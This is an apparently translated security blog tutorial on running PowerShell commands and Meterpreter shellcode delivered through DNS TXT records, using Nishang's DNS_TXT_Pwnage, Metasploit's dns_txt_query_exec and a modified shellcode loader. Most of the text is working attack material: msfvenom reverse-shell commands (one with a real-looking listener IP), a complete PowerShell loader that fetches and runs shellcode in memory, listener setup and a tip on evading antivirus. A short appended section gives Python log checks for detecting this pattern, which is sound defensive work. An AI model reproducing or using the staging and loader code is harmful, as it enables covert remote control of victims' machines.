Evi1cg, 2015/10/06

0x00 Overview

DNS TXT records are generally used to hold descriptive text about a host name or domain name; you can put anything in them, up to a length of 255. Most TXT records in practice carry SPF records (anti-spam). This article focuses on how to use Nishang to execute PowerShell scripts by creating TXT records. Of course, you first need a domain name.

0x01 Creating TXT Records

This uses a script from Nishang called Out-DnsTxt.

1. Common commands

Because common commands are short, they can be added directly to a TXT record, as shown below:

Now look at the TXT record:

You can see that the record has been successfully added.

2. Scripts

Since a TXT record is limited to 255 characters, adding a script requires splitting it across multiple TXT records. Here is an example, using a small PSH script written for this test:

```powershell
function Get-User
{
<#
.SYNOPSIS
Script to generate DNS TXT for a test.

.DESCRIPTION
Use this script to get user information.
to be more big.. more big... big..
Do one thing at a time, and do well. Keep on going never give up.

.EXAMPLE
PS > Get-User
#>
    [CmdletBinding()]
    Param ()

    net user
}
```

Use Out-DnsTxt to convert it:

```text
PS F:\DNS> . .\Out-DnsTxt.ps1
PS F:\DNS> Out-DnsTxt -DataToEncode .\Get-User.ps1
You need to create 2 TXT records.
All TXT Records written to F:\DNS\encodedtxt.txt
```

Because the script is small, only two records are produced:

Add these two lines in order to 1.ps.domain.com and 2.ps.domain.com, as shown below:

Querying the TXT records shows that the content has been added:

0x02 PowerShell execution

Once the TXT records are in place, they can be executed with DNS_TXT_Pwnage.ps1.

DNS_TXT_Pwnage.ps1 is a backdoor script that receives commands or scripts via DNS TXT records.

Two more records need to be added, start and stop, as shown below:

1. Run commands

```text
PS F:\DNS> . .\DNS_TXT_Pwnage.ps1
PS F:\DNS> DNS_TXT_Pwnage -startdomain start.evi1cg.me -cmdstring start -commanddomain command.evi1cg.me -psstring test -psdomain xxx.evi1cg.me -Subdomains 1 -StopString stop
```

The parameters:

  • startdomain: the start.domain record created above; its TXT value is read back as a string.
  • cmdstring: an arbitrary string.
  • commanddomain: the domain name whose TXT record holds the command.
  • psstring: an arbitrary string.
  • psdomain: the domain or subdomain whose TXT records hold the script.
  • Subdomains: the number of TXT records the script was split into (for example, 2 for the script created in 1.2).
  • StopString: an arbitrary string.

The key parameter is startDomain: its TXT value is compared with cmdString and psString. If it equals cmdString, the command held in commandDomain is executed; if it equals psString, the script held in psDomain is executed.

Here cmdString is start, which matches the TXT record value of start.evi1cg.me, so the command in commandDomain runs. The result is shown below:

Different commands can be executed by changing the TXT value of command.domain, for example Get-Host:

2. Execute the script

```text
PS F:\DNS> . .\DNS_TXT_Pwnage.ps1
PS F:\DNS> DNS_TXT_Pwnage -startdomain start.evi1cg.me -cmdstring bulabula -commanddomain command.evi1cg.me -psstring start -psdomain ps.evi1cg.me -Arguments Get-User -Subdomains 2 -StopString stop
```

Note that psString is now start, matching the TXT record of start.domain, while cmdString is an arbitrary string. The effect is shown below:

There is one extra parameter here: -Arguments specifies the name of the function to run. Testing showed that a script containing Chinese characters fails. For scripts that need parameters, edit the parameter values inside the script.

0x03 Shellcode execution

First, generate PowerShell-format shellcode with MSF:

```text
☁ ~ sudo msfvenom -p windows/meterpreter/reverse_tcp -f powershell LHOST=X.X.X.X LPORT=8887 > pspayload.txt
```

Convert the generated file with Out-DnsTxt:

```text
PS F:\DNS> Out-DnsTxt -DataToEncode .\pspayload.txt
You need to create 3 TXT records.
All TXT Records written to F:\DNS\encodedtxt.txt
```

Then add each of the generated lines to its TXT record, as shown below:

The test target is a 32-bit Windows 7 system. Start a listener with MSF:

```text
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 8887
LPORT => 8887
msf exploit(handler) > set LHOST x.x.x.x
LHOST => x.x.x.x
msf exploit(handler) > exploit

[*] Started reverse handler on x.x.x.x:8887
[*] Starting the payload handler...
```

We also need a script to fetch the TXT records and execute them. Here I have modified a script:

```powershell
function Execute-Code
{
<#
.PARAMETER Shelldomain
The domain (or subdomain) whose subdomain's TXT records would hold shellcode.

.PARAMETER subdomains
The number of subdomains which would be used to provide shellcode from their TXT records.

.PARAMETER AUTHNS
Authoritative Name Server for the domains.

.EXAMPLE
PS > Execute-Code
The payload will ask for all required options.

.EXAMPLE
PS > Execute-Code -Shelldomain 32.alteredsecurity.com -SubDomains 5 -AUTHNS f1g1ns2.dnspod.net.
Use above from non-interactive shell.
#>
    [CmdletBinding()]
    Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $Shelldomain,

        [Parameter(Position = 1, Mandatory = $True)]
        [String]
        $Subdomains,

        [Parameter(Position = 2, Mandatory = $True)]
        [String]
        $AUTHNS
    )

    function Get-ShellCode
    {
        Param(
            [Parameter()]
            [String]
            $Shelldomain
        )
        # Query 1.$Shelldomain .. N.$Shelldomain at the authoritative server and join the quoted TXT strings
        $i = 1
        while ($i -le $subdomains)
        {
            $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$Shelldomain $AUTHNS")
            $temp = $getcommand | select-string -pattern "`""
            $tmp1 = ""
            $tmp1 = $tmp1 + $temp
            $encdata = $encdata + $tmp1 -replace '\s+', "" -replace "`"", ""
            $i++
        }
        # The joined data is base64 of a deflate stream (the Out-DnsTxt format); decode and inflate it
        $dec = [System.Convert]::FromBase64String($encdata)
        $ms = New-Object System.IO.MemoryStream
        $ms.Write($dec, 0, $dec.Length)
        $ms.Seek(0, 0) | Out-Null
        $cs = New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
        $sr = New-Object System.IO.StreamReader($cs)
        $sc = $sr.readtoend()
        return $sc
    }

    $Shell = (Get-ShellCode $Shelldomain)

    #Remove unrequired things from msf shellcode
    $tmp = $Shell -replace "`n","" -replace '\$buf \+\= ',"," -replace '\[Byte\[\]\] \$buf \=' -replace " "
    [Byte[]]$sc = $tmp -split ','

    #Code Execution logic
    $code = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@
    Try
    {
        $winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
        $size = 0x1000
        if ($sc.Length -gt 0x1000) {$size = $sc.Length}
        $x = $winFunc::VirtualAlloc(0,0x1000,$size,0x40)
        for ($i = 0; $i -le ($sc.Length-1); $i++) {$winFunc::memset([IntPtr]($x.ToInt64()+$i), $sc[$i], 1)}
        $winFunc::CreateThread(0,0,$x,0,0,0)
        sleep 100000
    }
    Catch [system.exception] { "caught a system exception" }
}
```

Shelldomain is the domain or subdomain under which the TXT records were created. Subdomains is the number of TXT records created, for example 3. AUTHNS is the authoritative name server for the domain; I used DNSPod, so AUTHNS is f1g1ns2.dnspod.net.

Execute on 32-bit Windows 7:

```text
PS C:\Users\evi1cg\Desktop> . .\Execute-Code.ps1
PS C:\Users\evi1cg\Desktop> Execute-Code -Shelldomain 32.evi1cg.me -subdomains 3 -AUTHNS f1g1ns2.dnspod.net
```

A Meterpreter session is obtained successfully:

For a 64-bit target, change the payload and the script accordingly.

0x04 Supplement

Metasploit includes dns_txt_query_exec.rb, a payload that queries TXT records in the order a.domain, b.domain, ... and executes what they hold. Generate the stage it will fetch:

```text
☁ ~ sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.238.225.222 LPORT=8887 -e x86/alpha_mixed BufferRegister=EDI -f raw > reverse.txt
```

Use the following script to split the file into 255-character pieces:

```python
#!/usr/bin/env python
# coding=utf-8

def txt(string, length):
    # Cut the payload into pieces of at most `length` characters, the TXT record limit
    return [string[x:x + length] for x in range(0, len(string), length)]

with open('out.txt', 'w+') as f:
    line = open('reverse.txt', 'r').read()
    line = txt(line, 255)
    for txts in line:
        f.writelines(txts + '\n\n\n\n')
```

The output is as follows:

Add these three lines to the TXT records of a.domain, b.domain and c.domain respectively:

Generate the exe:

```text
☁ ~ sudo msfvenom -p windows/dns_txt_query_exec DNSZONE=evi1cg.me -f exe > test.exe
```

Start the MSF listener:

```text
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST x.x.x.x
LHOST => x.x.x.x
msf exploit(handler) > set LPORT 8887
LPORT => 8887
msf exploit(handler) > exploit
```

Run the exe to get a Meterpreter session:

As for AV evasion, you can generate the shellcode in C format and build an evasive payload from that.
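Both the DNS_TXT_Pwnage and Execute-Code flows earlier on this page (poll a trigger record, then fetch 1.domain .. N.domain) and dns_txt_query_exec here (fetch a.zone, b.zone, c.zone) leave a recognisable pattern in resolver logs. The following added Python example, not part of the original post, runs two checks over constructed log lines: a client resolving the same TXT name repeatedly, and a client walking a contiguous run of numbered or lettered TXT labels under one parent name. The log format, client addresses and domain names are made up for the example.

```python
import re
from collections import defaultdict

# Constructed resolver log, "<client> <qname> <qtype>" per line (not a real product format)
SAMPLE_LOG = """\
10.0.0.5 start.example-c2.test TXT
10.0.0.5 start.example-c2.test TXT
10.0.0.5 start.example-c2.test TXT
10.0.0.5 1.ps.example-c2.test TXT
10.0.0.5 2.ps.example-c2.test TXT
10.0.0.5 3.ps.example-c2.test TXT
10.0.0.9 a.example-c2.test TXT
10.0.0.9 b.example-c2.test TXT
10.0.0.9 c.example-c2.test TXT
"""

def txt_queries(log: str):
    """Yield (client, qname) for TXT queries; qname lower-cased without trailing dot."""
    for line in log.splitlines():
        m = re.match(r"^(\S+) (\S+) TXT$", line)
        if m:
            yield m[1], m[2].lower().rstrip(".")

def label_index(label: str):
    """'1','2',... -> 1,2,...; 'a','b',... -> 1,2,...; anything else -> None."""
    if label.isdigit():
        return int(label)
    return ord(label) - ord("a") + 1 if len(label) == 1 and label.isalpha() else None

def find_sequences(log: str, min_len: int = 3) -> dict:
    """{(client, parent): [qnames]}: one client fetched TXT for labels 1..N (or a..) under one parent."""
    seen = defaultdict(dict)
    for client, qname in txt_queries(log):
        head, _, parent = qname.partition(".")
        idx = label_index(head)
        if parent and idx is not None:
            seen[(client, parent)][idx] = qname
    hits = {}
    for key, by_idx in seen.items():
        idxs = sorted(by_idx)
        if len(idxs) >= min_len and idxs == list(range(1, len(idxs) + 1)):  # contiguous run from 1
            hits[key] = [by_idx[i] for i in idxs]
    return hits

def find_polling(log: str, min_count: int = 3) -> dict:
    """{(client, qname): count}: one TXT name resolved repeatedly, as polling a trigger record does."""
    counts = defaultdict(int)
    for client, qname in txt_queries(log):
        counts[(client, qname)] += 1
    return {k: v for k, v in counts.items() if v >= min_count}
```

Thresholds are deliberately low for the sample; on real resolver logs, tune min_count to the poll interval and suppress known parents (SPF and DKIM lookups rarely use numbered labels).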

0x05 Summary

This article introduced a way of executing commands and Nishang scripts through DNS TXT records; I hope it is useful.

This article was originally written by EVI1CG and first published on WooYun Drops.